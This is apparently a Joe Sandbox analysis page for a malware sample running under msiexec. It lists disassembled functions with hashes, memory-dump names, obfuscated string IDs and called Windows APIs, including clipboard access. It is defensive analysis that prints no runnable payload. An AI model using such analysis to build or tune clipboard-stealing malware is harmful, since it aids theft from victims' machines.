                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: !E{$5a!g$:om$;m)c$>s;q$B0$M1S7$T/i-$^#X!$a+c)$c'[%$d?O=$lk$mu$x~$%'$57$9;$=?$ac$qs$}s
                                                                                                                                                                                                                                • API String ID: 0-54867547
                                                                                                                                                                                                                                • Opcode ID: f0df1ecf5451a991e3113636eafd6b213825e9e910424cdc6b6169a2e67132c9
                                                                                                                                                                                                                                • Instruction ID: 9ca6d4ae1f2f64d04f7a99fa3392c7fdaefb99ab50e0a4db7e23410516b2ee0a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0df1ecf5451a991e3113636eafd6b213825e9e910424cdc6b6169a2e67132c9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30724EB06093858BE734CF15D881BDBBBE1BB82304F108A2DD5D99B396DB748146CF92
                                                                                                                                                                                                                                Function 003000C0 Relevance: 23.2, Strings: 18, Instructions: 702COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: !E{$5a!g$:om$;m)c$>s;q$B0$M1S7$T/i-$^#X!$a+c)$c'[%$d?O=$lk$mu$x~$ac$qs$}s
                                                                                                                                                                                                                                • API String ID: 0-3380732962
                                                                                                                                                                                                                                • Opcode ID: fba972f5e850118022a53f90a0baa10fbdb0a061049a9d261fc2c8631a3334c3
                                                                                                                                                                                                                                • Instruction ID: 357402912833989903aed2f6ff7da87a83758cb85bed969cbd4934dffc3c70f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fba972f5e850118022a53f90a0baa10fbdb0a061049a9d261fc2c8631a3334c3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4724EB16093858BE334CF15D881B9FBBE1BB82304F108A2DD5D99B396DB748546CF92
                                                                                                                                                                                                                                Function 0030DA40 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 118clipboardCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                • String ID: <$F$G$]$c
                                                                                                                                                                                                                                • API String ID: 2832541153-1818401840
                                                                                                                                                                                                                                • Opcode ID: 2415e78230a63c72ccee3805d607b7d72ae58d053f5330cacf076698c258fcac
                                                                                                                                                                                                                                • Instruction ID: acd06e3d20f81882a45c1cfd55ae5716ab3a89081de332430d169a182a03e11a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2415e78230a63c72ccee3805d607b7d72ae58d053f5330cacf076698c258fcac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B41C47110D7818FD302AFBC949836FFFE49B82324F45896DE4D9862D2D6788548C793
                                                                                                                                                                                                                                Function 002F4C0D Relevance: 17.1, Strings: 13, Instructions: 836COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: =:;8$=:;8$=:;8$=:;8$t%cz$t%cz$t%cz$t%cz$t%cz$t%cz$t%cz$t%cz$t`rS
                                                                                                                                                                                                                                • API String ID: 2994545307-3223954259
                                                                                                                                                                                                                                • Opcode ID: 1b7a347aada1adcdd181ed60fea651d530430c63b4f80aad0319ff7aa3a8970c
                                                                                                                                                                                                                                • Instruction ID: c08a4b8986bc2f9349e271abfcf90efb1fa2b1b95110cd12ab2c4ebe08368ac9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b7a347aada1adcdd181ed60fea651d530430c63b4f80aad0319ff7aa3a8970c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62328A72A282228BD329CF28CC5077BB797FBD5340F69853DCA8597255DB70A912CBC1
                                                                                                                                                                                                                                Function 002E96D0 Relevance: 16.7, Strings: 13, Instructions: 419COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ~`e$~`e$3$";yi$&$8$<$GDMv$KOAK$^TVZ$h|{$jQ6o$w}f:
                                                                                                                                                                                                                                • API String ID: 0-598920927
                                                                                                                                                                                                                                • Opcode ID: 7efb5ec6f57011f14955be026c5cd2b1979d3f95fe6787914194d3367219e38b
                                                                                                                                                                                                                                • Instruction ID: 10eccdee668619eb7c36b37f32a6d0160d14856c100586c4656e885eb3b9baf2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7efb5ec6f57011f14955be026c5cd2b1979d3f95fe6787914194d3367219e38b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0C1E27154C7D28AD322CF2A845036BFFE1AF93344F4849ADE0D59B392D739854ACB92
                                                                                                                                                                                                                                Function 002FA380 Relevance: 13.4, Strings: 10, Instructions: 889COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: #$]D$,m>-$-259$-L"2$7-?i$7.UH$Ng^P$a`|f$kqcd$tdfj
                                                                                                                                                                                                                                • API String ID: 0-2351467422
                                                                                                                                                                                                                                • Opcode ID: 0730886c56a357f233a8c0ec69bde4623a69b7419b8d7dbd9f738c9a3dad4533
                                                                                                                                                                                                                                • Instruction ID: 9120f502afbdfa053223525667c5bb80322e764f52b774f271d90bc3aeda2fe4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0730886c56a357f233a8c0ec69bde4623a69b7419b8d7dbd9f738c9a3dad4533
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB6211B0514B428FC735CF29C480666FBF2BF56354B188A6DD5EA8BB92C731E806CB51
                                                                                                                                                                                                                                Function 00302939 Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 570COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: w4j$2-0$HX$T*0$bom$v4j
                                                                                                                                                                                                                                • API String ID: 0-968726969
                                                                                                                                                                                                                                • Opcode ID: 23d848a413e33153721a31d887168501e510b3ee817e0b4c8b43d5fbbf8bc658
                                                                                                                                                                                                                                • Instruction ID: 327b935c77b92dc51f67ad8d6a57570a26d4031fd5420881c35dbcb3668b8c9f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23d848a413e33153721a31d887168501e510b3ee817e0b4c8b43d5fbbf8bc658
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 900224716093418FC715CF28D8A166BBBE5EF85304F15496DF4D68B281DB78DE0ACB82
                                                                                                                                                                                                                                Function 002EB050 Relevance: 10.4, Strings: 8, Instructions: 416COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4$=g$_ZJ~$krt$vr$yhk}$}t$~{
                                                                                                                                                                                                                                • API String ID: 0-3292924365
                                                                                                                                                                                                                                • Opcode ID: 00a063784a1b6de205f93ea70b59f6d69a41e3ebb7a7b745a521286cf604d347
                                                                                                                                                                                                                                • Instruction ID: e9762528cca6dcff3aafb9abb6d9e44d8ea96fcfb763a75a9b57caa32143bb70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a063784a1b6de205f93ea70b59f6d69a41e3ebb7a7b745a521286cf604d347
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63D118B16583828BC715CF26C89126FFBE2ABC1344F5C892DE5D68B351D735C909CB42
                                                                                                                                                                                                                                Function 003069C0 Relevance: 10.2, Strings: 8, Instructions: 250COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %1.}$++ .$/<8*$8$!!$BAtV$GQ@G$]DCN$^^I@
                                                                                                                                                                                                                                • API String ID: 0-3604263128
                                                                                                                                                                                                                                • Opcode ID: 196ab75bbe8a4fab7f3332105bdf5d4725d70f45149c9900f140d596000b0750
                                                                                                                                                                                                                                • Instruction ID: c9d420519469a4609dfefd0d8be7c9de4adcab9caf24bba02da394642e8541f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 196ab75bbe8a4fab7f3332105bdf5d4725d70f45149c9900f140d596000b0750
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A591BEB0205B818BE7368F3984A17E3BBE1EF52304F18896CC5EA4B386D77864068B55
                                                                                                                                                                                                                                Function 00313140 Relevance: 9.0, Strings: 7, Instructions: 292COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $#$&$6$6$A$[
                                                                                                                                                                                                                                • API String ID: 0-1486101539
                                                                                                                                                                                                                                • Opcode ID: 62d5a1e40bcea8813327a195e538162f4ab32a73481d3661522d752851e79f1a
                                                                                                                                                                                                                                • Instruction ID: a5f27885c5f56fc2c050fcb0f4e1d58140058c1933f126221dbba6350cb83e89
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62d5a1e40bcea8813327a195e538162f4ab32a73481d3661522d752851e79f1a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69A1456260C7D18AD706817C988439BAEC24BEB234F1D8F7DE9E1C7BC2D169C6458363
                                                                                                                                                                                                                                Function 0619B8B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,0619BBCB,00000002,00000000,?,?,?,0619BBCB,?,00000000), ref: 0619B952
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,20001004,0619BBCB,00000002,00000000,?,?,?,0619BBCB,?,00000000), ref: 0619B97B
                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,0619BBCB,?,00000000), ref: 0619B990
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                • Opcode ID: ec3d856a6f2dff8856e20d113d90f35ae4af5c9612863807c61ddba42784ce34
                                                                                                                                                                                                                                • Instruction ID: b77fd4ad3a8071012e68aa9c5da07b45a177e6ad7f86d2df3697d91e616c525d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec3d856a6f2dff8856e20d113d90f35ae4af5c9612863807c61ddba42784ce34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE21B8B2E28105EADFB48F14E901BA773A7EF64B90B478464E949D7114E732D941C7B0
                                                                                                                                                                                                                                Function 0031B480 Relevance: 8.2, Strings: 6, Instructions: 652COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: HDc$InA>$PWVU$Ugfe$p$x
                                                                                                                                                                                                                                • API String ID: 0-362884788
                                                                                                                                                                                                                                • Opcode ID: cf7d81e4114b2e19b388cff798bf27d27dd255994cffe0f0627720453b8ac1cf
                                                                                                                                                                                                                                • Instruction ID: 80618fbbc1885b1c54da46b0ee8018011785c8026e863ef87b68f9b4e6d412d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf7d81e4114b2e19b388cff798bf27d27dd255994cffe0f0627720453b8ac1cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D22E2316083554FD31ACE28C8903AFFBE1EBC9714F19C92DE5A59B392DB75C8468782
                                                                                                                                                                                                                                Function 002E9B50 Relevance: 7.9, Strings: 6, Instructions: 361COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: A714F7109BB40122E13A883D95AC3A84$Sdlg$[hmn$d${hcT$uw
                                                                                                                                                                                                                                • API String ID: 0-3157321161
                                                                                                                                                                                                                                • Opcode ID: 6728f6fa38d4a81e69298fda7ce56a632b818bf5ceab53a40e6a81870fab506e
                                                                                                                                                                                                                                • Instruction ID: 0d562e65a6688616ad0309fc59d405b0db0e426cebe9e7c5fc2b1cf154479d1e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6728f6fa38d4a81e69298fda7ce56a632b818bf5ceab53a40e6a81870fab506e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08C1F1B05583808FD724DF26C89176BBBE5EF92314F14896EE5D58B291D738C80ACB63
                                                                                                                                                                                                                                Function 0619BA95 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0619BB9D
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0619BBDB
                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0619BBEE
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0619BC36
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0619BC51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
